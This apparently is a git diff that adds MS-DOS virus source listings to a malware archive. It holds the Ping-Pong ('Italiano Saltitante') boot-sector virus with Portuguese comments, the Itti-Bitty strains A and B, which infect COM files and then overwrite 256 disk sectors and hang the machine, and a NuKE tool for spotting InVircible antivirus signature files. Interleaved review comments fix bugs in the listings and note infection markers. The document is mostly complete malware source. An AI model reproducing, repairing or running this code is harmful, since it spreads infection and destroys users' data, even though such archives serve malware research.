+ push bx ; e' que se faz o movimento da bola
+ push cx ; pelo ecran
+ push dx
+ push cs
+ pop ds
+ mov ah,0f ; Ver qual o tipo de modo de video
+ int 10
+ mov bl,al
+ cmp bx,ds:modo_pag ; Comparar modo e pagina de video com
+ jz ler_cur ; os anteriores
+ mov ds:modo_pag,bx ; Quando aqui chega mudou-se o modo
+ dec ah ; de video
+ mov ds:colunas,ah ; Guardar o numero de colunas
+ mov ah,1
+ cmp bl,7 ; Comparar modo com 7 (80x25 Mono)
+ jnz e_CGA
+ dec ah
+e_CGA: cmp bl,4 ; Ve se e' modo grafico
+ jnb e_grafico
+ dec ah
+e_grafico: mov ds:muda_attr,ah
+ mov word ptr ds:coordenadas,0101
+ mov word ptr ds:direccao,0101
+ mov ah,3 ; Ler a posicao do cursor
+ int 10
+ push dx ; ... e guarda-la
+ mov dx,ds:coordenadas
+ jmp short limites
+
+ler_cur: mov ah,3 ; Ler a posicao do cursor ...
+ int 10
+ push dx ; ... e guarda-la
+ mov ah,2 ; Posicionar o cursor no sitio da bola
+ mov dx,ds:coordenadas
+ int 10
+ mov ax,ds:carat_attr
+ cmp byte ptr ds:muda_attr,1
+ jnz mudar_atr
+ mov ax,8307 ; Atributos e carater 7
+mudar_atr: mov bl,ah ; Carregar carater 7 (bola)
+ mov cx,1
+ mov ah,9 ; Escrever a bola no ecran
+ int 10
+limites: mov cx,ds:direccao ; Agora vai-se ver se a bola esta' no
+ cmp dh,0 ; ecran . Linha = 0 ?
+ jnz linha_1
+ xor ch,0ff ; Mudar direccao
+ inc ch
+linha_1: cmp dh,18 ; Linha = 24 ?
+ jnz coluna_1
+ xor ch,0ff ; Mudar direccao
+ inc ch
+coluna_1: cmp dl,0 ; Coluna = 0 ?
+ jnz coluna_2
+ xor cl,0ff ; Mudar direccao
+ inc cl
+coluna_2: cmp dl,ds:colunas ; Colunas = numero de colunas ?
+ jnz esta_fixe
+ xor cl,0ff ; Mudar direccao
+ inc cl
+esta_fixe: cmp cx,ds:direccao ; Mesma direccao ?
+ jnz act_bola
+ mov ax,ds:carat_attr
+ and al,7
+ cmp al,3
+ jnz nao_e
+ xor ch,0ff
+ inc ch
+nao_e: cmp al,5
+ jnz act_bola
+ xor cl,0ff
+ inc cl
+act_bola: add dl,cl ; Actualizar as coordenadas da bola
+ add dh,ch
+ mov ds:direccao,cx
+ mov ds:coordenadas,dx
+ mov ah,2
+ int 10
+ mov ah,8 ; Ler carater para onde vai a bola
+ int 10
+ mov ds:carat_attr,ax
+ mov bl,ah
+ cmp byte ptr ds:muda_attr,1
+ jnz nao_muda
+ mov bl,83 ; Novo atributo
+nao_muda: mov cx,1
+ mov ax,0907 ; Escrever a bola no ecran
+ int 10
+ pop dx
+ mov ah,2 ; Recolocar o cursor no posicao onde
+ int 10 ; estava antes de escrever a bola
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ pop ds
+velho_8 equ $+1
+ jmpf 0:0
+Int_8 endp
+
+Carat_attr dw ? ; 7fcd
+Coordenadas dw 0101 ; 7fcf
+Direccao dw 0101 ; 7fd1
+Muda_attr db 1 ; 7fd3
+Modo_pag dw ? ; 7fd4
+Colunas db ? ; 7fd6
+
+; Os bytes que se seguem destinam-se a reservar espaco para o stack
+
+Virus ENDS
+
+END begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.italiano.asm b/MSDOS/Virus.MSDOS.Unknown.italiano.asm
new file mode 100644
index 00000000..2f0c335f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.italiano.asm
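Review bot: MSDOS/Virus.MSDOS.Unknown.ital.asm looks like a duplicate of MSDOS/Virus.MSDOS.Unknown.italiano.asm added in the next hunk: the header block, `.RADIX 16`, the twice-declared `jmpf` macro and every routine visible on this page (`entry` through `Int_13`) are identical, and the diffstat differs by a single line (454 vs 455). If the two listings are the same sample, keep one; if they differ on purpose, a one-line header comment naming the difference would save readers from diffing them by hand. For anyone using the listing for identification rather than assembly, it would also help to state in the header that the on-disk infection marker tested at `cmp word ptr ds:[offset flag+0400],1357` is the word `Flag dw 1357` placed directly after the `dw 0aa55` boot signature, and that installation shows up as a 2 KB drop in the BIOS memory-size word at 0040:0013 (`mov ax,ds:[0413]` / `sub ax,2`) together with a replaced INT 13h vector at 0000:004C. This hunk is complete; the italiano hunk continues past the end of the page.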
@@ -0,0 +1,455 @@ +; ************************************************** +; *** VIRUS ITALIANO SALTITANTE - A LISTAGEM *** +; *** Desassemblagem obtida por Miguel Vitorino *** +; *** Para : S P O O L E R - Junho de 1989 *** +; ************************************************** + +.RADIX 16 + +jmpf macro x + db 0eah + dd x +endm + +Virus SEGMENT +assume cs:virus;ds:virus + +jmpf MACRO x + db 0eah + dd x +ENDM + +org 0100h + +begin: jmp short entry + + db 1eh-2 dup (?) ; Informacao relativa a' disquete + +entry: xor ax,ax + mov ss,ax + mov sp,7c00 ; Colocar o Stack antes do inicio do + mov ds,ax ; virus + mov ax,ds:[0413] ; Retirar 2 K como se nao existissem + sub ax,2 ; para que o DOS nao la' chegue ! + mov ds:[0413],ax + mov cl,06 ; Converter o tamanho da RAM num + shl ax,cl ; numero de segmento que se situa nos + sub ax,07c0 ; 2 ultimos K + mov es,ax ; De seguida passar este programa + mov si,7c00 ; para esse sitio de memoria + mov di,si ; ( i.e. o programa transfere-se a si + mov cx,0100 ; proprio ) + repz movsw + mov cs,ax ; Transferencia de controlo para ai! + push cs ; Agora sim , ja' estamos nos tais 2K + pop ds + call reset ; fazer duas vezes um "reset" ao +reset: xor ah,ah ; controlador de disco + int 13 + and byte ptr ds:drive,80 + mov bx,ds:sector ; Sector onde esta' o resto do virus + push cs + pop ax + sub ax,0020 + mov es,ax + call ler_sector ; Ler o resto do virus da drive + mov bx,ds:sector + inc bx + mov ax,0ffc0 ; Carregar o sector de boot original + mov es,ax + call ler_sector + xor ax,ax + mov ds:estado,al + mov ds,ax + mov ax,ds:[004c] ; "Confiscar" o interrupt 13 + mov bx,ds:[004e] ; ( operacoes sobre disquetes/discos ) + mov word ptr ds:[004c],offset int_13 + mov ds:[004e],cs + push cs + pop ds + mov word ptr ds:velho_13,ax ; Guardar a velha rotina do int. 
13 + mov word ptr ds:velho_13+2,bx + mov dl,ds:drive + jmpf 0:7c00 ; Efectuar o arranque do sistema + +Esc_Sector proc near + mov ax,0301 ; Escrever um sector da drive + jmp short cs:transferir +Esc_Sector endp + +Ler_Sector proc near + mov ax,0201 ; Ler um sector da drive +Ler_Sector endp + +Transferir proc near ; Efectuar uma transferencia de dados + xchg ax,bx ; de ou para a drive + add ax,ds:[7c1c] ; Este procedimento tem como entrada + xor dx,dx ; o numero do sector pretendido ( BX ) + div ds:[7c18] ; e de seguida sao feitas as contas + inc dl ; para saber qual a pista e o lado + mov ch,dl ; onde esse sector fica + xor dx,dx + div ds:[7c1a] + mov cl,06 + shl ah,cl + or ah,ch + mov cx,ax + xchg ch,cl + mov dh,dl + mov ax,bx ; Depois de todas as contas feitas +transf: mov dl,ds:drive ; pode-se chamar o interrupt 13H + mov bx,8000 ; es:bx = end. de transferencia + int 13 + jnb trans_exit + pop ax +trans_exit: ret +Transferir endp + +Int_13 proc near ; Rotina de atendimento ao int. 13H + push ds ; (operacoes sobre discos e disquetes) + push es + push ax + push bx + push cx + push dx + push cs + pop ds + push cs + pop es + test byte ptr ds:estado,1 ; Testar se se esta' a ver se o virus + jnz call_BIOS ; esta' no disco + cmp ah,2 + jnz call_BIOS + cmp ds:drive,dl ; Ver se a ultima drive que foi + mov ds:drive,dl ; mexida e' igual a' drive onde + jnz outra_drv ; se vai mexer + xor ah,ah ; Neste momento vai-se tirar a' sorte + int 1a ; para ver se o virus fica activo + test dh,7f ; Isto e' feito a partir da leitura + jnz nao_desp ; da hora e se for igual a um dado + test dl,0f0 ; numero , o virus e' despoletado + jnz nao_desp + push dx ; Instalar o movimento da bola + call despoletar + pop dx +nao_desp: mov cx,dx + sub dx,ds:semente + mov ds:semente,cx + sub dx,24 + jb call_BIOS +outra_drv: or byte ptr ds:estado,1 ; Indicar que se esta' a testar a + push si ; presenca ou nao do virus na drive + push di + call contaminar + pop di + pop si + and byte ptr ds:estado,0fe ; 
Indicar fim de teste de virus +call_BIOS: pop dx + pop cx + pop bx + pop ax + pop es + pop ds +Velho_13 equ $+1 + jmpf 0:0 +Int_13 endp + +Contaminar proc near + mov ax,0201 + mov dh,0 + mov cx,1 + call transf + test byte ptr ds:drive,80 ; Pediu-se um reset a' drive ? + jz testar_drv ; Sim , passar a' contaminacao directa + mov si,81be + mov cx,4 +proximo: cmp byte ptr [si+4],1 + jz ler_sect + cmp byte ptr [si+4],4 + jz ler_sect + add si,10 + loop proximo + ret + +ler_sect: mov dx,[si] ; Cabeca+drive + mov cx,[si+2] ; Pista+sector inicial + mov ax,0201 ; Ler esse sector + call transf +testar_drv: mov si,8002 ; Comparar os 28 primeiros bytes para + mov di,7c02 ; ver se o sector de boot e' o mesmo + mov cx,1c ; i.e. ver se a drive ja' foi virada ! + repz movsb + cmp word ptr ds:[offset flag+0400],1357 + jnz esta_limpa + cmp byte ptr ds:flag_2,0 + jnb tudo_bom + mov ax,word ptr ds:[offset prim_dados+0400] + mov ds:prim_dados,ax ; Se chegar aqui entao a disquete ja' + mov si,ds:[offset sector+0400] ; esta' contaminada ! + jmp infectar +tudo_bom: ret + +; Neste momento descobriu-se uma disquete nao contaminada ! Vai-se agora +; proceder a' respectiva contaminacao ! 
+ +esta_limpa: cmp word ptr ds:[800bh],0200; Bytes por sector + jnz tudo_bom + cmp byte ptr ds:[800dh],2 ; Sectores por cluster + jb tudo_bom + mov cx,ds:[800e] ; Sectores reservados + mov al,byte ptr ds:[8010] ; Numero de FAT's + cbw + mul word ptr ds:[8016] ; Numero de sectores de FAT + add cx,ax + mov ax,' ' + mul word ptr ds:[8011] ; Numero de entradas na root + add ax,01ff + mov bx,0200 + div bx + add cx,ax + mov ds:prim_dados,cx + mov ax,ds:[7c13] ; Numero de sectores da drive + sub ax,ds:prim_dados + mov bl,byte ptr ds:[7c0dh] ; Numero de sectores por cluster + xor dx,dx + xor bh,bh + div bx + inc ax + mov di,ax + and byte ptr ds:estado,0fbh ; Se o numero de clusters dor superior + cmp ax,0ff0 ; a 0FF0 entao cada entrada na FAT sao + jbe sao_3 ; 4 nibbles senao sao 3 + or byte ptr ds:estado,4 ; 4 = disco duro ? +sao_3: mov si,1 ; Escolher sector a infectar + mov bx,ds:[7c0e] ; Numero de sectores reservados + dec bx + mov ds:inf_sector,bx ; Sector a infectar + mov byte ptr ds:FAT_sector,0fe + jmp short continua + +Inf_Sector dw 1 ; Sector a infectar +Prim_Dados dw 0c ; Numero do primeiro sector de dados +Estado db 0 ; Estado actual do virus (instalado/nao instalado,etc) +Drive db 1 ; Drive onde se pediu uma accao +Sector dw 0ec ; Sector auxiliar para procura do virus +Flag_2 db 0 ; Estes proximos valores servem para ver se o virus +Flag dw 1357 ; ja' esta' ou nao presente numa drive , bastando + dw 0aa55 ; comparar se estes valores batem certos para o saber + +continua: inc word ptr ds:inf_sector + mov bx,ds:inf_sector + add byte ptr ds:[FAT_sector],2 + call ler_sector + jmp short l7e4b + +; Este pequeno pedaco de programa o que faz e' percorrer a FAT que ja' esta' na +; memo'ria e procurar ai um cluster livre para colocar nesse sitio o resto do +; virus + +verificar: mov ax,3 ; Media descriptor + ff,ff + test byte ptr ds:estado,4 ; disco duro ? 
+ jz l7e1d + inc ax ; Sim , FAT comeca 1 byte mais adiante +l7e1d: mul si ; Multiplicar pelo numero do cluster + shr ax,1 + sub ah,ds:FAT_sector + mov bx,ax + cmp bx,01ff + jnb continua + mov dx,[bx+8000] ; Ler a entrada na FAT + test byte ptr ds:estado,4 + jnz l7e45 + mov cl,4 + test si,1 + jz l7e42 + shr dx,cl +l7e42: and dh,0f +l7e45: test dx,0ffff ; Se a entrada na FAT for zero,entao + jz l7e51 ; descobriu-se um cluster para por o +l7e4b: inc si ; virus , senao passa-se ao proximo + cmp si,di ; cluster ate' achar um bom + jbe verificar + ret + +; Ja' foi descoberto qual o cluster a infectar ( registo BX ) , agora vai-se +; proceder a' infeccao da disquete ou disco e tambem a' marcacao desse cluster +; como um "bad cluster" para o DOS nao aceder a ele + +l7e51: mov dx,0fff7 ; Marcar um "bad cluster" (ff7) + test byte ptr ds:estado,4 ; Ver qual o tamanho das ents. na FAT + jnz l7e68 ; ( 3 ou 4 nibbles ) + and dh,0f + mov cl,4 + test si,1 + jz l7e68 + shl dx,cl +l7e68: or [bx+8000],dx + mov bx,word ptr ds:inf_sector ; Infectar sector !!! + call esc_sector + mov ax,si + sub ax,2 + mov bl,ds:7c0dh ; Numero de sectores por cluster + xor bh,bh + mul bx + add ax,ds:prim_dados + mov si,ax ; SI = sector a infectar + mov bx,0 ; Ler o sector de boot original + call ler_sector + mov bx,si + inc bx + call esc_sector ; ... e guarda'-lo depois do virus +infectar: mov bx,si + mov word ptr ds:sector,si + push cs + pop ax + sub ax,20 ; Escrever o resto do virus + mov es,ax + call esc_sector + push cs + pop ax + sub ax,40 + mov es,ax + mov bx,0 ; Escrever no sector de boot o virus + call esc_sector + ret +Contaminar endp + +Semente dw ? ; Esta word serve para fins de + ; temporizacao da bola a saltar +FAT_sector db 0 ; Diz qual e' o numero do sector que + ; se esta' a percorrer quando se + ; vasculha a FAT + +Despoletar proc near ; Comecar a mostrar a bola no ecran + test byte ptr ds:estado,2 ; Virus ja' esta' activo ? 
+ jnz desp_exit ; Sim ,sair + or byte ptr ds:estado,2 ; Nao , marcar activacao + mov ax,0 + mov ds,ax + mov ax,ds:20 ; Posicionar interrupt 8 (relogio) + mov bx,ds:22 + mov word ptr ds:20,offset int_8 + mov ds:22,cs + push cs + pop ds ; E guardar a rotina anterior + mov word ptr ds:velho_8+8,ax + mov word ptr ds:velho_8+2,bx +desp_exit: ret +Despoletar endp + +Int_8 proc near ; Rotina de atendimento ao interrupt + push ds ; provocado pelo relogio 18.2 vezes + push ax ; por segundo . Neste procedimento + push bx ; e' que se faz o movimento da bola + push cx ; pelo ecran + push dx + push cs + pop ds + mov ah,0f ; Ver qual o tipo de modo de video + int 10 + mov bl,al + cmp bx,ds:modo_pag ; Comparar modo e pagina de video com + jz ler_cur ; os anteriores + mov ds:modo_pag,bx ; Quando aqui chega mudou-se o modo + dec ah ; de video + mov ds:colunas,ah ; Guardar o numero de colunas + mov ah,1 + cmp bl,7 ; Comparar modo com 7 (80x25 Mono) + jnz e_CGA + dec ah +e_CGA: cmp bl,4 ; Ve se e' modo grafico + jnb e_grafico + dec ah +e_grafico: mov ds:muda_attr,ah + mov word ptr ds:coordenadas,0101 + mov word ptr ds:direccao,0101 + mov ah,3 ; Ler a posicao do cursor + int 10 + push dx ; ... e guarda-la + mov dx,ds:coordenadas + jmp short limites + +ler_cur: mov ah,3 ; Ler a posicao do cursor ... + int 10 + push dx ; ... e guarda-la + mov ah,2 ; Posicionar o cursor no sitio da bola + mov dx,ds:coordenadas + int 10 + mov ax,ds:carat_attr + cmp byte ptr ds:muda_attr,1 + jnz mudar_atr + mov ax,8307 ; Atributos e carater 7 +mudar_atr: mov bl,ah ; Carregar carater 7 (bola) + mov cx,1 + mov ah,9 ; Escrever a bola no ecran + int 10 +limites: mov cx,ds:direccao ; Agora vai-se ver se a bola esta' no + cmp dh,0 ; ecran . Linha = 0 ? + jnz linha_1 + xor ch,0ff ; Mudar direccao + inc ch +linha_1: cmp dh,18 ; Linha = 24 ? + jnz coluna_1 + xor ch,0ff ; Mudar direccao + inc ch +coluna_1: cmp dl,0 ; Coluna = 0 ? 
+ jnz coluna_2 + xor cl,0ff ; Mudar direccao + inc cl +coluna_2: cmp dl,ds:colunas ; Colunas = numero de colunas ? + jnz esta_fixe + xor cl,0ff ; Mudar direccao + inc cl +esta_fixe: cmp cx,ds:direccao ; Mesma direccao ? + jnz act_bola + mov ax,ds:carat_attr + and al,7 + cmp al,3 + jnz nao_e + xor ch,0ff + inc ch +nao_e: cmp al,5 + jnz act_bola + xor cl,0ff + inc cl +act_bola: add dl,cl ; Actualizar as coordenadas da bola + add dh,ch + mov ds:direccao,cx + mov ds:coordenadas,dx + mov ah,2 + int 10 + mov ah,8 ; Ler carater para onde vai a bola + int 10 + mov ds:carat_attr,ax + mov bl,ah + cmp byte ptr ds:muda_attr,1 + jnz nao_muda + mov bl,83 ; Novo atributo +nao_muda: mov cx,1 + mov ax,0907 ; Escrever a bola no ecran + int 10 + pop dx + mov ah,2 ; Recolocar o cursor no posicao onde + int 10 ; estava antes de escrever a bola + pop dx + pop cx + pop bx + pop ax + pop ds +velho_8 equ $+1 + jmpf 0:0 +Int_8 endp + +Carat_attr dw ? ; 7fcd +Coordenadas dw 0101 ; 7fcf +Direccao dw 0101 ; 7fd1 +Muda_attr db 1 ; 7fd3 +Modo_pag dw ? ; 7fd4 +Colunas db ? ; 7fd6 + +; Os bytes que se seguem destinam-se a reservar espaco para o stack + +Virus ENDS + +END begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.itti-a.asm b/MSDOS/Virus.MSDOS.Unknown.itti-a.asm new file mode 100644 index 00000000..0c120420 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.itti-a.asm 
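Review bot: In `Despoletar`, `mov word ptr ds:velho_8+8,ax` stores the saved INT 8 offset eight bytes past `velho_8`; with `velho_8 equ $+1` sitting on the five-byte `jmpf 0:0`, that write lands (by my count) in the `Direccao` word and leaves the far-jump offset at 0, so the chained handler would be entered at oldseg:0000. The INT 13h hook in the entry code writes `velho_13` and `velho_13+2`, so this is most likely a transcription error in the listing and should read `mov word ptr ds:velho_8,ax`. Two smaller listing defects: `assume cs:virus;ds:virus` turns the DS assumption into a comment (MASM separates assumptions with a comma, `assume cs:virus,ds:virus`), and the `jmpf` macro is defined twice, once before and once inside `Virus SEGMENT`. The ital.asm copy added by this commit carries the same `velho_8+8` line.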
@@ -0,0 +1,124 @@
+; Itti-Bitty Virus, Strain A
+; The world's smallest virus (except for Strain B, but still only 161 bytes)
+;
+; (C) 1991 Nowhere Man and [NuKE] WaErZ
+; Written by Nowhere Man
+
+ title "The Itti-Bitty Virus, Strain A: The smallest virus ever"
+
+ code segment 'CODE'
+ assume cs:code,ds:code,es:code,ss:code
+
+ org 0100h
+
+code_length equ finish - start
+
+start label near
+
+id_bytes proc near
+ mov si,si ; Serves no purpose: our ID
+id_bytes endp
+
+main proc near
+ mov ax,0FF0Fh ; Virex installation check function
+ int 021h
+ cmp ax,0101h ; Is Virex loaded?
+ je exit_virus ; If so, then bail out now
+
+ mov ah,04Eh ; DOS find first file function
+ mov cx,00100111b ; CX holds attribute mask
+ mov dx,offset com_spec ; DX points to "*.COM"
+
+file_loop: int 021h
+ jc go_off ; If there are no files, go off
+
+ call infect_file ; Try to infect found file
+ jne exit_virus ; Exit if successful
+
+ mov ah,04Fh ; DOS find next file function
+ jmp short file_loop ; Repeat until out of files
+
+exit_virus: mov ah,9 ; DOS display string function
+ mov dx,offset fake_error ; DX points to fake error message
+ int 021h
+
+ mov ax,04C01h ; DOS terminate function, code 1
+ int 021h
+main endp
+
+go_off proc near
+ cli ; Prevent all interrupts
+
+ mov ah,2 ; AH holds drive number (C:)
+ cwd ; Start with sector 0 (boot sector)
+ mov cx,0100h ; Write 256 sectors (fucks disk)
+ int 026h ; DOS absolute write interrupt
+
+ jmp $ ; Infinite loop; lock up computer
+go_off endp
+
+infect_file proc near
+ mov ax,04301h ; DOS set file attributes function
+ xor cx,cx ; Clear all attributes
+ mov dx,09Eh ; DX points to victim's name
+ int 021h
+
+ mov ax,03D02h ; DOS open file function, read-write
+ int 021h
+
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,03Fh ; DOS read from file function
+ mov cx,2 ; CX holds byte to read (2)
+ mov dx,offset buffer ; DX points to buffer
+ int 021h
+
+ cmp word ptr [buffer],0F68Bh ; Are the two bytes "MOV SI,SI"
+ pushf ; Save flags
+ je close_it_up ; If not, then file is OK
+
+ cwd ; Zero CX \_ Zero bytes from start
+ mov cx,dx ; Zero DX /
+ mov ax,04200h ; DOS file seek function, start
+ int 021h
+
+ mov ah,040h ; DOS write to file function
+ mov cx,code_length ; CX holds virus length
+ mov dx,offset start ; DX points to start of virus
+ int 021h
+
+close_it_up: mov si,095h
+ lodsb
+ push ax ; Save file's attributes for later
+ lodsw
+ xchg cx,ax ; CX holds [096h]
+ lodsw
+ xchg dx,ax ; DX holds [098h]
+ mov ax,05701h ; DOS set file time function
+ int 021h
+
+ mov ah,03Eh ; DOS close file function
+ int 021h
+
+ mov ax,04301h ; DOS set file attributes function
+ pop cx ; CX holds file's old attributes
+ mov dx,09Eh ; DX points to victim's name
+ int 021h
+
+ popf ; Restore flags
+ ret ; Return to caller
+
+buffer dw ? ; Buffer to hold test data
+infect_file endp
+
+
+; Initialized data goes here
+
+com_spec db "*.COM",0 ; What to infect: all COM files
+
+fake_error db "EXEC failure",13,10,"$" ; Fake error message
+
+finish label near
+
+code ends
+ end id_bytes
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.itti-b.asm b/MSDOS/Virus.MSDOS.Unknown.itti-b.asm
new file mode 100644
index 00000000..8f6886c8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.itti-b.asm
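Review bot: The annotation on `mov ah,2 ; AH holds drive number (C:)` in `go_off` contradicts the INT 26h interface, which takes the drive number in AL (AH is not an input); at that point AL presumably still holds the error code the failed INT 21h/4Eh or 4Fh call returned in AX, so an analyst trusting the comment would misjudge where the payload writes. For a corpus listing the correction belongs in the comment, not the code: `; NOTE: INT 26h takes the drive in AL, not AH — AL here is the leftover INT 21h error code`. The branch comment `je close_it_up ; If not, then file is OK` is also inverted: the jump is taken when the first word already equals 8B F6h, i.e. the file already carries the ID, so `; Already carries the ID word: skip it` would be accurate.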
@@ -0,0 +1,96 @@
+; The Itti-Bitty Virus, Strain B
+; The smallest virus ever written (only 99 bytes)
+;
+; (C) 1991 Nowhere Man and [NuKE] WaErZ
+; Written by Nowhere Man
+;
+;
+
+ title "The Itti-Bitty Virus, Strain B: Even smaller"
+
+ code segment 'CODE'
+ assume cs:code,ds:code,es:code,ss:code
+
+ org 0100h
+
+code_length equ finish - start
+
+start label near
+
+id_bytes proc near
+ mov si,si ; Serves no purpose: our ID
+id_bytes endp
+
+main proc near
+ mov ah,04Eh ; DOS find first file function
+ mov cx,00100111b ; CX holds attribute mask
+ mov dx,offset com_spec ; DX points to "*.COM"
+
+file_loop: int 021h
+ jc go_off ; If there are no files, go off
+
+ call infect_file ; Try to infect found file
+ jne exit_virus ; Exit if successful
+
+ mov ah,04Fh ; DOS find next file function
+ jmp short file_loop ; Repeat until out of files
+
+exit_virus: mov ax,04C01h ; DOS terminate function, code 1
+ int 021h
+main endp
+
+go_off proc near
+ cli ; Prevent all interrupts
+
+ mov ah,2 ; AH holds drive number (C:)
+ cwd ; Start with sector 0 (boot sector)
+ mov cx,0100h ; Write 256 sectors (fucks disk)
+ int 026h ; DOS absolute write interrupt
+
+ jmp $ ; Infinite loop; lock up computer
+go_off endp
+
+infect_file proc near
+ mov ax,03D02h ; DOS open file function, read-write
+ mov dx,09Eh ; DX points to the victim
+ int 021h
+
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,03Fh ; DOS read from file function
+ mov cx,2 ; CX holds byte to read (2)
+ mov dx,offset buffer ; DX points to buffer
+ int 021h
+
+ cmp word ptr [buffer],0F68Bh ; Are the two bytes "MOV SI,SI"
+ pushf ; Save flags
+ je close_it_up ; If not, then file is OK
+
+ cwd ; Zero CX \_ Zero bytes from start
+ mov cx,dx ; Zero DX /
+ mov ax,04200h ; DOS file seek function, start
+ int 021h
+
+ mov ah,040h ; DOS write to file function
+ mov cx,code_length ; CX holds virus length
+ mov dx,offset start ; DX points to start of virus
+ int 021h
+
+close_it_up: mov ah,03Eh ; DOS close file function
+ int 021h
+
+ popf ; Restore flags
+ ret ; Return to caller
+
+buffer dw ? ; Buffer to hold test data
+infect_file endp
+
+
+; Initialized data goes here
+
+com_spec db "*.COM",0 ; What to infect: all COM files
+
+finish label near
+
+code ends
+ end id_bytes
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm b/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm
new file mode 100644
index 00000000..af9f04ce
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.ivdetect.asm
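Review bot: The header should record that, unlike Strain A, this strain restores neither the victim's timestamp nor its attributes: `close_it_up` goes straight from `mov ah,03Eh` to `popf`/`ret` with no INT 21h/5701h or 4301h call, so every infection bumps the file's modification time and, since the 3D02h open is unchecked, presumably just fails on read-only files. That is a useful detection hint and worth stating at the top, e.g. `; Unlike Strain A: no time/date or attribute restore, so infected files get a fresh timestamp`. The `mov ah,2 ; AH holds drive number (C:)` comment in `go_off` has the same AL/AH mismatch against the INT 26h interface as Strain A.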
@@ -0,0 +1,143 @@ +; +; InVircible Signature File Scanner for v6.02, (c)1995 ûirogen [NuKE] +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; Zvi changed his signature files a little in v6.02; although all the +; documentation says that he changed it in v6.01d, I never noticed a change +; until this new version. Anywayz, what he did was simply change his little +; verification word to one that my previous algorithm would think was a false +; positive. Namely 'MZ', 'PK', and 60EAh (which corresponds to EXE headers, +; PKZIP archives, and ARJ archives, respectively). So, since we can't just +; look at the first word of the file, else we'll have many false positives, +; we simply check the next record (42h bytes) for a valid signature. If both +; records contain a valid signature then it's almost definatly an invircible +; signature file. +; +; This utility is an example of how to detect InVircible signature files. +; It skips files larger than 16896 bytes, as it's unlikely that a signature +; file will contain more than 256 different entries and the speed increase +; is definatly of worth in a virus. To use, just run it and it'll scan all +; files in the current directory for InVircible signatures. +; +; + +segment cseg + assume cs: cseg, ds: cseg, es: cseg, ss: cseg + +max_size equ 256*66 ; maximum size of file to scan +lf equ 0ah +cr equ 0dh + +org 100h +start: + lea dx,vanity ; credz.. 
+ call disp + mov ah,1ah + lea dx,ff_info + int 21h ; set DTA + xor bp,bp + xor cx,cx + lea dx,filespec + mov ah,4eh + int 21h ; find first + jnc find_loop + jmp exit +find_loop: + inc bp ; bp is our counter + lea dx,msg1 ; display 'Testing:' + call disp + lea dx,f_name + push dx + call disp ; display file name + mov ax,3d00h ; open file + pop dx + int 21h + jnc no_error + lea dx,error + call disp + jmp not_iv +no_error: + xchg ax,bx ; get handle + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ; get file size + cmp dx,0 + jnz close + cmp ax,max_size ; file too big? + jae close + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ; reset file pointer + mov ah,3fh ; read first 44h bytes + mov cx,44h + lea dx,buf + int 21h + cmp ax,44h ; was there only one record? + jz close + mov ax,word ptr buf ; if so simulate second record + mov word ptr buf[42h],ax +close: + mov ah,3eh ; close + int 21h + lea di,buf + call chk_iv + jnz not_iv + lea di,buf[42h] + call chk_iv + jnz not_iv + lea dx,is_iv ; display affirmatice + call disp +not_iv: + mov ah,4fh ; find next + int 21h + jc exit + jmp find_loop + +exit: + cmp bp,0 ; find any files? 
+ jnz some_done + lea dx,no_files ; if not, display a msg + call disp +some_done: + lea dx,done + call disp + ret + +chk_iv: + cmp word ptr [di],0EA60h ; check record + jz yea_iv + cmp word ptr [di],'KP' + jz yea_iv + cmp word ptr [di],'ZM' +yea_iv: + ret + +disp: ; displays null terminated string via + mov cx,0ffh ; DOS + mov di,dx + xor ax,ax + repnz scasb ; search for null + dec di + push di + mov byte ptr [di],'$' ; replace with '$' + mov ah,9 + int 21h + pop di + mov byte ptr [di],0 ; reset null + ret + +vanity db cr,lf,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ' + db cr,lf,' InVircible v6.02 Signature File Detector, (c)1995 ûirogen [NuKE]' + db cr,lf,'ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ',cr,lf,0 +msg1 db cr,lf,'Testing File: ',0 +no_files db cr,lf,' No files found!',cr,lf,0 +is_iv db cr,lf,' þ Is an Invircible Signature File!',0 +error db cr,lf,' þ Error Opening! Is this file in the current dir?',0 +done db cr,lf,cr,lf,' Scan Complete.',cr,lf,0 +filespec db '*.*',0 +ff_info db 30 dup(0) +f_name db 13 dup(0) +buf db 44h dup(0) +cseg ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm b/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm new file mode 100644 index 00000000..a13175a1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ivkiller.asm 
